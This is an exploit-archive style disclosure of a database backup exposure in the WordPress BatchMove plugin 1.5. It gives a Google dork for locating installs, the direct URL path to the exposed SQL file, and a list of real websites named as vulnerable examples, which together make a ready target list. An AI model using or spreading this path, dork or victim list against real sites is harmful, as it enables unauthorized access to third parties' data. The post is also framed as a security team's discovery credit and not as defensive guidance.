################################################################################################# # Exploit Title : WordPress BatchMove Plugins 1.5 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 06/12/2018 # Vendor Homepage : wordpress.org/plugins/batchmove/ # Software Download Link : github.com/wp-plugins/batchmove/archive/master.zip + downloads.wordpress.org/plugin/batchmove.zip # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.5 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/batchmove/'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/batchmove/sql/de-factuur-structure.sql ################################################################################################# # Example Vulnerable Sites => [+] mitropolija.com/wp-content/plugins/batchmove/sql/de-factuur-structure.sql [+] evilspeculator.com/wp-content/plugins/batchmove/sql/de-factuur-structure.sql [+] legaldictionary.net/wp-content/plugins/batchmove/sql/de-factuur-structure.sql [+] merchantandmills.com/wp-content/plugins/batchmove/sql/de-factuur-structure.sql [+] luci.eu/wp-content/plugins/batchmove/sql/de-factuur-structure.sql [+] caroli.org/wp-content/plugins/batchmove/sql/de-factuur-structure.sql [+] merchantandmills.com/wp-content/plugins/batchmove/sql/de-factuur-structure.sql [+] visitcullman.org/wp-content/plugins/batchmove/sql/de-factuur-structure.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################